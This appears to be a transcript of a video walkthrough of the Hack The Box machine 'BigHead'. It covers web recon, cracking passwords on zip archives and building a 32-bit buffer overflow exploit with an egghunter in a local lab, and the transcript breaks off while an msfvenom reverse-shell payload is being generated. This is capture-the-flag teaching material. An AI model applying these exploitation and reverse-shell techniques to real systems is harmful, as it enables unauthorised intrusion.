What's going on YouTube? This is IPSec, and we're going to be doing BigHead from HackTheBox, which was a really tough box that I wish I had more time to prepare for. Normally, insane boxes, it takes me like 10 to 12 hours before the video just to prepare and learn everything. This time, it is Friday night, and I am just beginning on it. I have a bunch of notes to go by, so it should go halfway well. But last week I was in the red team training by Spectre Ops. This week I've been dealing with being out of work for a week because I was in training the previous week, so my time is a bit sparse right now. The box begins with a bunch of recon. You find a custom web server called the BigHead Web Server. You pull the file off of GitHub, find out that by sending it a BigHead request, you can do a buffer overflow, but there is very small space to work with. It is a 32-bit OS, so you can do an EggHunter relatively easily, get a low priv shell, you do a bunch of magic, get a high priv shell, and then the root.txt is within a KeePass file. So with all that being said, let's just jump in and hope for the best. As always, we start with the Nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the Nmap directory and call it BigHead, and the IP address, which is 10.10.10.112. Can take some time to run, so I've already ran it. Looking at the results, we have just one port open, that is HTTP on port 80, and it's running NGINX version 1.14. The title of the page is PiperNet Comes, not really that beneficial to us, and unlike most boxes, we don't have anything that is leaking like any details about the OS. Normally, it's running like the Apache web server, and the OS is in the header, or it has SSH, which is a hint it's Linux, or 445 open, which is Windows, of course, but we don't have any of that information. So I'm going to run nmap-A, which is host OS detection, and then -P80, because that's the only port that's open. It'll speed it up a little bit. And then 1112 is the IP address. And while that's running, we can also just do it ourselves with ping-C1, 10.10.10.112, and we see the TTL is 127, which is the default for Windows. Actually, the default is 128, but as Nmap tells us, there's one hop between us and 112, and every hop, you decrement the TTL by 1. So that's why we see 127 there. If we try to ping ourselves, which is a Linux box, we'll get a TTL of 64, because Linux defaults to 64 for the TTL. And then most networking equipment defaults to something above 200, so it's a way to identify the OS. Looking at the results of this, Nmap is guessing it is Windows 7 Vista 2008, Phone 8.1 of 2012, and it's about 91% sure. So it's telling us essentially what we already found out through pinging it. So let's just move on and check out what the web page has for us. So going to 10.10.10.112, we get the PiperNet web page. So let's just scroll down and see if there's anything interesting. We do have some links to like Twitter and Facebook, but look at the bottom left when I hover over these links, it just has the pound sign, so these are no links to nowhere. We have Pied Piper Coin Comes, looks like a blog post. If we go in, it's just an anchor text, so there's nothing really interesting there. Find out more, and it's going to a web page, the piedpipercoin.html, and this looks very similar to what we saw before. We have a cryptocurrency presentation, and let's just keep scrolling down. We get a bunch of people, so if I was treating this like a web pen test, I'd probably open up Cherry Tree at this point, and then let's make this the right size, and go here. And then I'm going to press Control-Alt-Shift, and then the down arrow key to send it to a workspace below. And that way, I don't have to hunt through Alt-Tab to get to my cherry tree. I can just hit Control-Alt and then down arrow key. So we have the founder and CEO. So let's do Control-N to create a new node. Call this BigHead. Control-Shift-N to create a child node. We'll do people. And I guess we'll be fine with this. Normally, I'd spend more time formatting it, but it's always handy to get a list of information on all the people. So copy all of this, and this could come in handy later on in the box if we ever get like a password or we want to do social engineering and do like a phishing attack. Once we figure out how their emails are set up, we'll be able to create a big email list quickly. So that's it for that. We also have an email, info@bachmanity.htb. So I'm going to go back to, I can do people and do email addresses, and then put info at, can I make this bigger? There we go. bachmanity.htb. And we also want to put a new child node for host, and we have bachmanity.htb, which is an email address. We don't have much information about that. So let's keep going through the website. We see more social media links. We don't really have anything. We have a contact or team. So we'll just put test@test.com. Please subscribe to IPSec as the contact or team. Send a message. And right off the bat, we're going to a host mailer.bighead.htb/sendmail.php. So I'm going to create a host entry record, so v etc host, and we'll put 10.10.10.112, and we know this box is probably bighead.htb, mailer.bighead.htb, and then bachmanity.htb. Normally you wouldn't have to do that step because you have DNS in the real world. HackTheBox doesn't do DNS, so that's why we're doing that. We go to bighead.htb. It is that website, but let's scroll down and do this mail thing again. So test, send message, and it just says message sent. So I'm going to capture this in Burp and just see what it does. So go to Foxy Proxy, send it to Burp Suite, and let's go down. Test. Send message, Burp Suite, nothing really too interesting. Click forward and nothing happens. So the next thing I want to do while I'm in Recon is grab this PDF. So let's go back here. We'll make the artifacts and go in there and do a wget against it, just download it quickly. And when that downloads, then we can do exif tool against it and examine the metadata, because there may be information about usernames, emails, etc. within the metadata of this PDF. PDF is done, so we'll just do exif tool, cryptocurrency.presentation, and we have quite a bit. So we have the creator is Adobe Illustrator CC 22.1 Macintosh. So I'm going to copy this, go back to a cherry tree, and then create a new node. That was Control-Shift-N. Add a child node, and we'll do internal infrastructure. And we're just going to put Adobe Illustrator CC 22.1 Macintosh. And if we ever did a phishing campaign, we now know we have to take into account that they may use Macs. Anyways, let's just go and see what other information we have in this PDF. Let's see. Users fawn dog. So let's copy this. Internal infrastructure will do people, create one that says handles, fawn dog, and put a note that said this came from cryptocurrency PDF. And I'm going to guess, just based upon knowing the show, this is probably Guilfoyle's handle, because Guilfoyle was the cryptocurrency person. Let's go up. Do we have anything else? Doesn't really look like any other information comes from this. So let's just move on, go back to the web page. And while this was going on, we probably should have been doing GoBuster. So we'll start GoBuster now. There always should be some type of recon going on in the background. So GoBuster-U for URL. We can just do bighead.htb. Word list, user share, word list, dirbuster, directory list, 2.3 medium. Let that go. And since we only had one port open, I'm also going to do nmap-p-, which is all ports. And I also want to do a source port of 53. So let's do man nmap and search for source port. That is going to be -G. So I'm going to do nmap-G 53. We could also do 80 or 443. Let's just do 443. and then -p all ports, OA for output all formats, putting Nmap, and we'll call this BigHead all ports, 10, 10, 10, 112. And the reason why I'm specifying a source port is generally firewalls may be misconfigured to allow port 443 because users want to get out to the internet. And if you just allow the TCP port 443 and don't specify ingress or egress, then now you may have created a whole back into infrastructure for attackers that use the source port of 443. So that's why I just specify source port when doing it this way. And also in Cherry Tree, I normally be notating like times of when I do things, which helps go back and for blue teams, when you go and say, hey, this is when I ran these commands, you can go back in your logs and identify if you saw this activity. Right now, I'm just glancing through the PDF to see if there's any usernames or anything, and it doesn't look like there is. A presentation by Guilfoyle. So Guilfoyle is probably Fawn Dog. So let's go back. Cryptocurrency PDF by Guilfoyle. So not sure if that will ever play in. And for more information, check out Henry. So that's not Guilfoyle, so we can ignore that. Quora post. So since we had one domain and we know another domain, which is mailer, if we go to mailer, we have an error log that reveals bighead.htb, but nothing else really there. So let's do another Go Buster. Scroll up so we can just copy and paste. And we'll specify mailer.bighead.htb as well. So let's do mailer.bighead.htb, and let's actually use out files. So mailer.bighead.gobust, and here we probably should have specified an out file as well. So I'll redo this. Well, this will be bighead. What did I call it? Was it gobust? Yeah. Gobust. And Nmap doesn't find any other ports. So another thing we can do instead of brute forcing pages, we can brute force subdomains. So we can do a wfuzz -H for header and put host : and then fuzz.bighead.htb. And before I do that, let's just check PHpMyAdmin.htb. And does this go anywhere? Looks like we do go somewhere. So we probably got another GoBuster thing we should be running, but we'll do fuzz.bighead.htb -w for word list, user share sec list, then what is a folder? Discovery, DNS, and I like the fierce host list .text, and the URL, which will be bighead.htb. And we want to now do a --h to hide character count, and we'll specify 11175. And all this is doing is, if we go back here, let's turn intercept on, refresh this page, send this to repeater. So if we git host bighead.htb, we see 404 not found. And the target is sending this data to bighead.htb. So we can set this target to be the IP address. So 10.10.10.112. Actually, an easier way to explain this would just be doing a request for that, so you can see what goes on. So 10.10.112. Refresh. And we see the host is set to that. When we go in repeater, we click go. Purplenet comes, and it's going to 10.10.10.112, sending this packet. So if we change the packet to PHpMyAdmin.htb, it still goes to the same place. We get a different response. This is because of the host header. The host header doesn't determine where the packet goes. The web server examines this and then decides what page to show based upon the host header. So hopefully that makes sense. It's virtual host routing, but going back to wfuzz, which has now finished, we have a code domain and a dev domain. So let's go back into our host file and do dev.code code.bighead.htb and code.bighead.htb. And we'll also run wfuzz again. And instead of bighead.htb, we'll do bachmanity.htb. Looking at GoBuster's responses, doesn't look like we have many good things. This one sends a lot of 302 redirects. Anything with index, it looks like it's sending us somewhere. So we can do turn burp off and see where it sends us. So go to mailer.bighead.htb/index, and it sends us to a page testlink that says an error has occurred. So that's where all those 302s are going. So let's check out Cherry Tree again and host. Now we have bighead.htb, dev.bighead.htb, code, and mailer. So we have a lot of domains going back, and there's probably good frameworks to use to automate doing this like type of recon, but showing it manually, and then maybe in a future video we'll go over a framework that does a lot of this. So where do we want to go next? Probably check out code.bighead.htb or dev. Let's check out code. So go back to Firefox. So let's go up and specify code.bighead.htb. And we get directed to 127.0.0.1, port 5080, testlink/login.php. So I'm going to click back in my web browser, go over to Burp. Let's do options, and we'll intercept everything. So this is client request. Let's do server response. Click intercept response based upon the following rules. And if we don't check anything, it'll intercept everything. So I generally like doing that because sometimes the content type header doesn't match text and you want to intercept it. So let's go to intercept, turn it on, go over to Firefox, go back to code.bighead.htb, and I hit something to go to c.net, which is odd. But going here, we can see the request to code, click forward, we get a 302 found, and it's directing us to /testlink/. We can follow that redirection. Now we're getting testlink. Click forward again, and it's sending us to 127.0.0.1 5080. Let's just change this to code.bighead.htb and see if this goes anywhere. So click forward, and now we're getting, we screwed something up because we're getting /code.bighead.htb/testlink/login.php, which brings us to a 404 not found. So let's try this again. So turn intercept on, forward, 302, get, here it is. So let's just do code.bighead.htb, click forward, and now we're just getting testlink/login.php to code bighead up there. So this time we didn't put that in the URL. Click forward again. And we have to forward this response, and it looks like we have a lot of information now. So click forward, turn intercept off because we don't need it anymore, and we can see a bunch of error messages. So we have C:\XAMPP, which is, I think, a web server or something. So let's add this into our notes on internal infrastructure and put web server has that. Let's see, test docs, htdocs, third party. So this is in the web server, which may be helpful when trying to guess where the htdocs directory is. So that's why I log that. And let's see, I can make this a bit bigger. Bitnami sounds like a application. So save this. And let's see, no connection could be made to the target active machine. I don't think there's anything else in this error message that we want to keep. So let's just move on. and check what our Go busters have. If we go up, still just getting a bunch of indexes. I'm just going to kill this one. What is /tpot here? Actually, 301 redirect /tpot. And that was on code, I believe. Tpot. Where is this one going to? Scroll all the way up. And this is mailer. So if we go to mailer.bighead.htb /tpot, we get an image, tpot.gif, that we can't load. Let's try view image. Maybe if we get rid of mailer and go bighead.htb, dev htb, and we get a weird GIF from Google that says 418, I'm a teapot. So don't know exactly what that is, but we can note it under odd things /teapot 418 Google GIF. So let's go back here and see if there's anything else. Doesn't look like it there. We have /backend. So let's check out what backend is. This one is bighead.htb. So let's do bighead.htb /backend. And it just directs us to /bighead and gives an error message. So nothing really interesting there. Let's check out, I guess, dev.bighead.htb. And we just get a picture of someone. So let's view image. Is there a save image? Save image as. And let's go root, documents. Crap. I hate using the search in Linux. Let's go back to home. Let's do HTB, boxes, and then this one is BigHead. Save it under artifacts, and then we'll call this not index.jpg, but dev bighead.jpg. And let's run exif tool against this, just like we did the PDF. So go into artifacts, exif tool, dev, and see if we see anything. Does not look like we have anything of interest here. So this is going to be one of the annoying things about this box that I guess you just have to use different tools sometimes. I'm not going to do GoBuster because GoBuster's default is to only show the status codes. I wish GoBuster had a way to, like, instead of being inclusive, be exclusive and say, hey, I just don't want to see any 404s and then display all other status codes. I don't think that's in this version, but I can make a request to that because then GoBuster may be a bit more useful in scenarios like this. So to get around that limitation, I'm just going to use wfuzz to brute force the code one. So wfuzz word list user share word list dirbuster, then directory list 23 medium -u the URL. Let's do dev bighead.htb, and that should be good. We need to do /fuzz, and this will just put every entry in that word list to the end of the URL. And we also now need to do --hh to hide character count and specify 26. And then I also don't want to see 404s, so I'll do --hc to hide code, and we'll let this run. So right off the bat, we get all these hits, which is fine. So we got blogs, WP content, bloggers. So while that runs, I guess we can check out blog. So let's go to dev bighead.htb /blog. And you can see my VM is now starting to go a bit slow with all this stuff running in the background. So going to dev.bighead.htb, we see the page isn't redirecting properly. So made the mistake. Let's turn Burp Suite back on and intercept exactly what it's doing to see if we can fix that redirection issue. So try again. We get /blog. It's moving us to dev bighead.htb /wp-content. So we're getting that. And now it's redirecting us to /blog. So we're getting that. And then it's redirecting us to WP content. And we can see we are now in a redirect loop. So we can ignore that, going back to terminal, seeing if we see anything else. There is coffee, and that is giving us an error code of 418, which does match that one GIF, or one thing we saw earlier. So let's Google, turn Burp Suite off, Google HTTP error code 418 to see what this is. And the error code is I'm a teapot, and it indicates the server refuses to brew coffee because it is a teapot, which looks like a joke RFC, but let's go and check out what that page is. So we go to dev.bighead.htb/coffee. So dev.bighead.htb/coffee, and we get this, which is the GIF we had saw earlier. So we know that is going to be at teapot.gif. Crap. Bighead HTB coffee. We have to go to dev. So let's go and look at what this says in Burp Suite. Intercept on, refresh the page, click forward, and we see the server is BigHead Web Server version 1.0. So we need to do some research at exactly what this is. So let's go over to Google and do BigHead Web Server 1.0. And we get a GitHub repository from Emergence, which is the machine creator. And we probably should move this internally on the box so we're not depending on github.com. HackTheBox policy has changed it to not allow external resources, but it changed, I believe, after this box. So we have 4 commits, and it looks like it is just a zip file. So let's click this, and we have Emergence doing all the commits. If we go to the latest commit, try to download bhws_backup.zip. Let's save this and then try to download it. So we'll make a directory git and then move downloads. Let's bhws backup.zip. I don't know which one it is. So let's just clear my downloads and re-download it. May have been an artifact from me playing around with the box when I did it the first time. So let's move downloads bhws.zip to our current directory and unzip it. And it looks like maybe it's got a password because it doesn't unzip properly. If we go into conf, we don't see anything. Need pk compat. So let's do, was it zip2john on bhws.zip. And we get the algorithm to try to crack it. So let's copy this and go over to my cracking rig, which is called the Kraken. And then let's do opt John, and I'm going to we'll do zip.bighead, paste this, and do John -- word list equals opt word list rocku.text. I don't know if it's -- word list. I normally don't use John. Zip.bighead. Let's see if it cracks. Let's see. -- format. No such file directory. It's not plural. Opt word list rocku.zip. There we go. And let this run and see if it finds anything. And I guess while that goes, we can also go and browse the commit history. And let's go browse the repo at this point and see what it is. Still just a zip file. Let's go back one more to see if they ever uploaded it without it being a zip. And it doesn't look like they have. So let's just download the one previous. So commits here, browse files, and we can download this zip. And then looks like it completed. So we can do john -- show. I would specify the hash -- show, and it gets the password as the Pied Piper 89. So let's open a new pane, go into Git, and we can do 7zx for extract bhws backup.zip, put the password in, and it decompresses. So we see BigHead Web Server exe notice. There we go. So let's just cat that text file. And he removed the vulnerable crapware from the archive. If we go into conf, we get a bunch of config stuff. So let's try going to that previous file that we had downloaded. So we'll rename this to backup-latest -latest, and then rm that old zip. And then let's move the zip in downloads and put it here. I don't know if that's the same zip. Let's just, again, clear my downloads of this zip. Downloads, what's the file name? bhws, rm-rf, downloads bhws star. Download the slightly older version. And then move downloads bhws backup.zip here. I'm just checking my clipboard to make sure I have the old password still in it. 7zx bhws backup.zip. Put the password, and we get wrong password. So let's do that zip to John again on this, and this is a probably different algorithm because it is much longer than the last one. So let's copy this. Holy cow. So copy, go over to SSH, what do we call it before? Zip.bighead. So let's do this again. And then paste and run the same exact command. And it looks like it loaded 2 and has already cracked. So let's do the show. And we see the password for this one is just BigHead. So let's 7zx bhws backup.zip. Let's delete bhws backup and put the password of BigHead. And let's go into this. And we get 2 different files. We have bigheadwebserver.exe and bigheadserver.dll. Going in the conf, we still have the NGINX configuration file. We could look at it. Let's do it in VI so it highlights it. And we could probably see the virtual host routing. So let's see. We have a proxy pass, so it's taking anything from / and redirecting it to 127.0.0.1:8008 /blog. This is the redirect loop we had saw / Pied Piper. Testlink dev backend / coffee. And / coffee is redirecting us to 127.0.0.1:8008. So this definitely looks like the config file for at least the NGINX portion. Let's grep -v nginx.conf grep period. Oh. Maybe grep period nginx.conf, grep-v, that. I think this will just get rid of all those empty lines. What I'm trying to do is find the host name. So I can probably just search this for host, server name localhost. So this is an NGINX box, and I'm guessing it's probably the config for dev. They may have some type of nested thing because I'm used to seeing like a host name field here. But I'm guessing this is the NGINX configuration file for either dev.bighead.htb or code.bighead.htb, whichever one has that teapot, dev.bighead.htb. So let us now, I guess, look at this BigHead Web Server.exe. So if we do strings against it, what do we see? Strings BigHead Web Server.exe. Let's just grep this for password, see if there's any hard-coded passwords in it. Grep it for a pass. Doesn't look like it. Let's do the same thing for the DLL. Strings bhead webserver.dll, grep-i pass. And we can also do like encoding to Boolean, S, and L. Just different ways to find strings, but we don't really get anything. So it looks like we're going to have to do some type of reversing on this binary. But before I go into reverse, I really like to find out more about the OS to find out the exact version. So let's go up a few directories and look through what our GoBusters have found. So nothing really there. Less mailer. Are they still running? Let's go back to SSH. It looks like our GoBusters are still running. So I'm going to pause the video, let these GoBusters finish, and then we'll take a look at the files they wrote to see if there's any files that will let us to identify exactly what OS it is, so then we can begin doing some reverse engineering of that binary. So the GoBusters have finished. Let's look at bighead.gobust, and we can see it just finds images, assets, and a bunch of backend redirects. And we know the backend just redirected to /bighead, so we don't really care about that. Let's look at mailer.bighead.gobust, and we have a bunch of indexes that redirected. So let's do a grep-v to remove them, and we just see /image and /teapot, neither of which are too interesting. So let's go and run yet another GoBust. So we'll do GoBuster-w for word list, and we'll do user share word list, GoBuster, directory list, 2, 3. Let's just do small. Maybe we'll go a bit quicker. -u for URL, code.bighead.htb, and we'll do -t 50 for threads 50 to try to speed this up. We'll do -o for out file, code.gobust. Run this and see if this gets anything. So URL domain, code.bighead. We found /dev. Bunch of indexes. This looks almost identical to how, /dashboard and /mail. Let's try that. It looks identical to how the last one we looked at was. But let's look at /dashboard. Welcome to XAMPP, which we had seen. We can check /mail, and we get Apache 2433, OpenSSL, PHP, etc., which is a bit odd because everything else we've seen is NGINX. So let's turn Burp Suite on and make sure we are intercepting. Refresh this, go to Burp Suite, forward, and looking at the server, this still says it's NGINX, but we see an Apache further. So we know something odd is going on here. So let's go back into our notes, go to odd things, and we say like the web server probably goes to an Apache rev proxy to a NGINX rev proxy maybe. to page. And Apache Red Proxy is probably running on port 5080. So now that I'm writing down the port, we probably got the web server, which is NGINX on port 80, going to the Apache Red Proxy on port 5080. So that's probably how that works. And then we also had NGINX. If we looked at that config, that was on, let's see, let's go back into Git, bhws, conf, and then less NGINX. Was there a port? 8008 is probably BigHead. So BigHead Web Server, port 8008. So we're kind of enumerating exactly how the web server is configured. And now we can go back and look at our GoBust results. And we still see not what I'd expect. So I'm just going to let this, oh wait, did I see something? We do see something here. We see PHPMyAdmin, so let's go definitely check that out because we know a lot of ways to execute code with PHPMyAdmin. Turn off Foxy Proxy, go to PHPMyAdmin, and looking at the bottom left, it is doing a lot of transfers and going back. I'm not sure exactly what's going on, but something odd is happening. I'm going to kill the GoBuster in case we're just hammering the server on my network too much to see if we get anything, and we just get a blank directory, but it's not an error code, and we see the PHPMyAdmin logo in this left of the tab. So let's do another GoBust. So we'll do GoBuster-W, user share. Let's this time do seclist because we want to find specifically PHP stuff because it's PHPMyAdmin. So discovery, web content, and let's just go into this directory real quick. cd user share seclist discovery, web content, ls grep-i, php. We got common PHP file names. Let's take a look at what this is to see if it has .php on the end of it. It does. So let's do cd dash to go to the previous directory. GoBuster-w. We can copy this and do /common PHP file names and then -u for URL, code.bighead.htb /PHPMyAdmin, and probably don't need to specify threads. Unable to connect. Let's see. Oh. Leave this PHPMyAdmin here. And if it helps, if I type the hostname correctly. -u code.bighead.htb. Okay, /PHPMyAdmin. And now we're finding a bunch of files. We have index.php, which goes nowhere. If we just do index.php, nothing happens. So let's try the next one down, PHPInfo.php. So let's try PHPInfo.php. And finally, we get information about this host. So we see it is Windows 2008, i586. So this is a 32-bit build. We also see the architecture as 32-bit. PHP is from 2013. So that is information about the host. So let's now go and try to exploit the BigHead Web Server. And to do that, I've already built a Windows 2008 box. So there we go. So now that we're on Windows 2008, we have to download Immunity Debugger, and we also will have to download Mona. I normally like using like x64 debug or x32 debug, but I have a bunch of trouble getting all that working on Windows 2008. So we're just using what is old because our OS is old. And we have Immunity downloading. So the next thing I want to do is go to Mona and download this. And this is just a Python kit that makes it a lot easier to do things in, both Immunity and x64 debug. So let's run this, close, and it's going to install Python now. And the reason why I'm not using that like Windows 10 machine that we did Commando with is because we want our exploit development to be as close as possible to what our target is. So get Mona, and if you're curious where I got this copy of Windows from, I just Googled Windows 2008 evaluation and went to the Microsoft website to download it. So now that we have Mona, let's go into Program Files, Immunity, Debugger, Py commands, and paste mona.py. So now we have to get the BigHead Web Server on this. So to do that, I'm going to go back to our HackTheBox machine, make a directory called SMB, go in SMB, and then do SMB server, which is part of Impacket. And if you don't have that, maybe you have like Impacket-SMB server. I think that's how Kali installs it. But if you install it from source, you probably have SMB server.py. We'll make the share name share, and then the directory, we'll just put a working directory. And then on our box, we can do a CMD, net use, z colon, 172.16.10, and what is my Kali's IP? If config eth 0, I am 122. And then the directory was share. Path not found. Okay, you can't have a leading slash with net use. So now we have that. We can copy BigHead into this directory. So copy get bhws backup into SMB. So that's all we need a Kali machine for a little bit. So let's go in Z and copy this to the desktop, try to run it, and we get an error message. So we need lib MinGW EX-0.dll. So I'm going to Google MinGW 32 Windows. We'll go to the SourceForge page. Notice the URL has -W64, which is 64-bit, so I get rid of that. And then we'll just download the file. So if we go into Files, it's in MinGW, then base, MinGW. Let's do, we have an option between December 6th or July 30th. Let's just do the latest one. May have been smart to do July 30th, but I don't know when that box was created. I think it was created sometime between July and December. That's why I said it may have been smart to do that. So that box may have 501. So just something to keep in mind of. So we want the DLL. This is libmingwex. So we can download this. And when this finishes, we can extract it. So let's 7-zip, open archive. And then we'll copy this binary into the BigHead Web Server. So now that we have that DLL, let's see if it runs or complains about something else. Nope, it is now running. So let's find out what port it listens on with a netstat dash, I think it's ATO. And we see, let's see, 135 we know, 445 we know, these ephemeral ports we probably know. 8008 is the weird one, that is PID 2640. We do task list, and then we can do find string, There's probably a /PID function actually, but find string should work. It does not. Maybe /PID 8008. Let's do /?. Let's see. Is there a way to search by PID? Task list. I'm not sure. So let's just look. So we wanted something with a 2. That stands out. 2640. That's what it was. So BigHead Web Server is listening on port 8008. So let's go back to our Kali box and try to curl 172.16.10 141 8008. That's not the IP address. I pulled the IP from the incoming connection, but VMware may be doing something odd. That could be my host IP. Let's see. We are on a NATed address, so I'm just going to go into my config. And let's set network into bridged mode. So this will take probably 15-20 seconds to get a new IP address. See, I am 157. Do I still have Z? Let's see if it remounts. Come on, remount Z. Doesn't look like it's remounting. And a lot of things froze. Exit, CMD, Z. Okay, remounted Z. I am 157. So let's curl that. 172.16.10 157 8008. Let's see. Maybe the firewall. Is it net sh adv firewall set all profiles off? I forget the command. Let's go into the actual firewall and set it manually. So properties off, off, off. Okay, go back to Kali. And now we can curl the web server. So this part of the video is where I'm going to potentially skip something because I don't want to show fuzzing on 2008. Number one, because I'm strapped on time right now. This video goes live in like 12 hours probably, maybe less. So I don't want to waste a lot of time setting up fuzzing on Windows 2008 and then run out of time on the tail end. So I'll probably do a separate video on fuzzing and do it on a modern OS because that'll be more beneficial than something that is already end of life. So we're just going to assume we know how to exploit the program. Sorry for the assumption, but I'm sure you'll thank me once I put out the fuzzing video. So we're just sending a request and sending it 128 A's. And we get a response back. Now we're going to change the method to a head request with 128 A's. And let's see. It's not what I wanted to happen. We need to put this in single quotes. So now I'm going to send it a head request. And it still worked. Let's just do python-c a times 128. Put it in single quotes. And I'm forgetting print. Print a times 128. So let's get rid of -- head. And it should respond. I don't think it should crash yet. Looks like it crashed even on that. Let's see. Let's launch this. I thought you had to do a head request. BigHead Web Server. A times 128, file not found. So that's what I expected. And we look, we're getting requests. So if I change this to --head to do a head request, sending the box BigHead a BigHead request actually crashes it. So let's go see what's happening. I'm going to run the program, open up Immunity, file, attach, and attach to BigHead. And this font's probably really small for you, so let's do appearance, fonts, change, 11. There we go. Hopefully that's a bit better. So always recommend running the program and then attaching to it, because Immunity will do some weird things if you don't do that. So let's rerun that command that crashed the box. And we have EIP is all A's. So now we have to find out where EIP crashed. So let's do Mona pattern create 128. And we have that. But before I do this, let's do Mona config set working folder z:\\. And now do this. And we go back to a Kali box, go into SMB, and we can see Mona created the pattern for us. And that is not the pattern I wanted. I expected to see this, and it showed me a bunch of Unicode. So let's just copy this message to clipboard, go into Z, and add it to the pattern. I am not sure what it did there. So now we can cat pattern, we can get this, and then we can do that curl request with that, but we have to restart BigHead before we do that. So let's exit out of that. Launch BigHead Web Server, launch Immunity, file, attach, BigHead, run this command, and we can see we crashed at ACC54AAC. So now we should be able to do Mona pattern find. I think it's ACC54AAC. Did not find it. Pattern offset. And not sure why it's doing this. Thought it would have found it. Let's just find it manually. That'll be a fun exercise. So let's go into CPU. And let's go to, I think EAX would be the start of it. No, let's go to ESP. How do we follow in stack? Nope. Follow in dump. I expect to see a lot more A's. See if we can find it. So let's see. Let's do Shift F7 and see if it goes forward any. It does not. Can we follow this anywhere? We can't. Let's see. Let's send it a little less A's and see if that helps us. I don't think it will, but it's always possible we just put in too much and we've smashed it way too hard. Hold on, dump. Yeah, so I'm going to relaunch this and we'll send it 100 A's and see what happens. So attach, BigHead, go back here, get rid of some. Let's see, paused, let's go. Oh, wait. I know what happened. I always think I was still on A's. It's been a long day. That was probably correct. So let's attach again. And then go back here. We'll send the first request with everything. And EIP, let's see, forward. EIP is ACC54AAC. So let's go to EAX. And let's see. Where is the start of our payload? So we send it AA0A. So if we go, let's see, follow ESP, that's 6A. Let's follow EAX, and we have AA0A. So if we look at ESP, let's follow this again, and go up just a little bit. So this is FB50, which is right here. Just before FB50, we have what EIP is. ACC, right here, AC C5, that's AC C5. The next thing is going to be 4A, then AC. So 4A, AC. So we can see that in the memory, and that is right at, that is 4.8, 4.9, 4A, 4B, 4C is when it starts. So let's go into calculator, switch it to scientific mode if you're not in it already, switch to hex, and we can do 0, 1, 0, 1, FB, 4C, then subtract that from the start of the payload, which is going to be EAX. So if we'd follow EAX in, that's going to be AA0A. So this will be subtracted by 0101 FB28 equals 24. Then we switch that to decimal, which is 36. And keep in mind, this is counting bytes. It's actually going to be 72 characters because we multiply that by 2. So 72 characters into the payload, we get to here. So that is how this program calculates where the pattern offset is. So at the start here, this is where EAX is. Then you have the probably EBP, then ESP. You have EAX, and then you have EIP right here. EBP is probably right here. C3 2A AC C1, C3 2A AC. Yep. So kind of getting a feel for how the memory is aligned here. And then after that, this is where ESP starts. ESP starts right after EIP. So we can start a note file and say EIP overwrite is equal to 72. We have EAX space is equal to 72 characters. Oh, not 72. It's even less. It's probably 68 because EBP takes up some space. And then ESP is after, let's see, 80 probably. So let's go to a Python script and start creating this. Actually, before we do that, no, we can. Let's do v exploit.py, and let's call payload is equal to nothing. Then, actually, we'll call it rev shell. No, we'll call this, call it exploit for now. We can always rename it. So plus equals, and we're going to do a times 72 minus 8. And then we'll do exploit plus equals b times 8. Then exploit plus equals c times 8. And exploit plus equals d times, we'll do 100. See what this does. And we also want to print exploit. So we'll copy this, go back to our curl command, paste, and restart BigHead. So that, open immunity, attach to BigHead, play, throw the payload, and it did not work. We did not crash it. So 100 may be too big. So let's do 80. So we shrunk it by 20 characters. Curl head 172, 1610, 157, 8008. Paste. Still nothing. Shrink it by some more. And finally, we have, looks like we crashed it. So we can see EIP is set to all C's, EBP is set to all B's, and then EDX has some D's in it. Let's see. If we go to EAX, it's pointing to all A's. So we can see EAX to EBX, which is pointed to right here. And we can see the B's there, and then ESP. So let's do Mona. And let's, I guess, search for modules. And this is going to tell us what compile protections there are. So safe execution handler, this is if it crashes, and it's false for three things. That's BigHead Web Server, Server DLL, and libmingw. We have ASLR disabled for those as well. We have dep disabled for those as well too. So everything I do, I'm going to try to ignore this libmin thing because that's something we downloaded and we don't know what version the server's running. So I'm going to hope to find like a jump ESP or EAX inside of the BigHead server.dll or the executable. So we'll do Mona JMP -r ESP. And if we go back, we can find a few ESPs. So we have 0x625012F0. So if we follow this, let's just double click it and it'll follow. So F0 is jump ESP and F2 is jump EAX. So keep those two in mind. We will put it in our notepad. So jump ESP is equal to 625012F0 and jump EAX is equal to the same thing but F2. Okay. So we can put spacing and then what is this? EBP is 69 to, I think that's 64. And this would be 65. This is all wrong. The math is hard doing it live, but roughly that's what we want. We can get rid of spacing. All we need is jump ESP and jump EAX. So let's save that to z:\\. important re.txt. And I'm going to go with a EggHunter on this because when we did the spacing, we don't have much space. We have like 32 bytes, and most ROP chains are even going to be bigger than 32 bytes. So we're going to do an EggHunter, which is a small thing, and essentially it allows us to put our shellcode anywhere. So the EggHunter, I'll type it on our HackTheBox. Is this big font? This is. So EggHunter is going to just be shellcode that searches for, we'll say, injected code. And it does that by us tagging it with something. So we're going to put like do a spray and put woot woot shellcode. And we're going to do this a bunch of times. So when we do that spray, then we can say, have our EggHunter say, search all memory for woot woot, and then execute what is after it. So that's what we're going to do. And as long as dep is disabled, this should work pretty easily. And on 32-bit, it doesn't take too long. On 64-bit, you have a lot more memory to look at normally, so it becomes an issue. But we're mainly doing it because of the limited amount of space we have. So I guess we can start creating the exploit. So let's do v exploit.py, and we can say cat smb important re. We want to copy these things. Paste. So let's see. We have both of those. So we need to create a web request. So of course we're going to do import requests. And then our host is going to be 172.16.10.157. Our port is going to be 8008. And we can make the URL is equal to HTTP plus our host plus colon our port. Okay, so that should be good. Next thing we need is the EggHunter. So let's go over to our box, and we'll do Mona EggHunter. And it gave us an EggHunter, and let's see if it put it in a logical spot. Put this tag in your shellcode. Doesn't look like it did. So maybe putting our working directory here didn't help us as much as I thought it would. So copy this. Copy this. And then save. Go back to a box. And we can cat EggHunter.txt and save this. Let's go back into our exploit. Paste EggHunter plus equals EggHunter plus equals. Okay. The next thing we need is junk. So we'll do junk is equal to \x90, which is a NOP times 72 divided by 2, because we can do 72 A's, and this is 2 characters instead of the 1. So after that, we need a shell. So we'll do rev shell Actually, let's just msf venom dash L, I think, and we'll grep for win grep rev. Let's do L payloads. And we get a bunch of them. So let's just search for reverse shell. Do we find any? Let's see. Let's go all the way top to msf venom. We can search for shell. Windows. Where is it? Can we just search for go to the bottom underscore TCP. Let's see. So many things, and I hate having the font a little big because it spans the lines and now is hard to read. Windows shell reverse TCP. Let's see. I want shell underscore reverse TCP. Shell reverse TCP. There we go. This is what I want. If you do the shell slash, that means it's a staged one, and this is stageless. Stageless is a bit bigger, but a bit more reliable. So let's do msf venom dash p, the shell, L host is equal to rbox. So we'll do 172.16.10, 122. If config eth 0. Yep, 122. L port. Let's set it to 443 because that's always allowed out of firewalls. Dash format, we'll do python 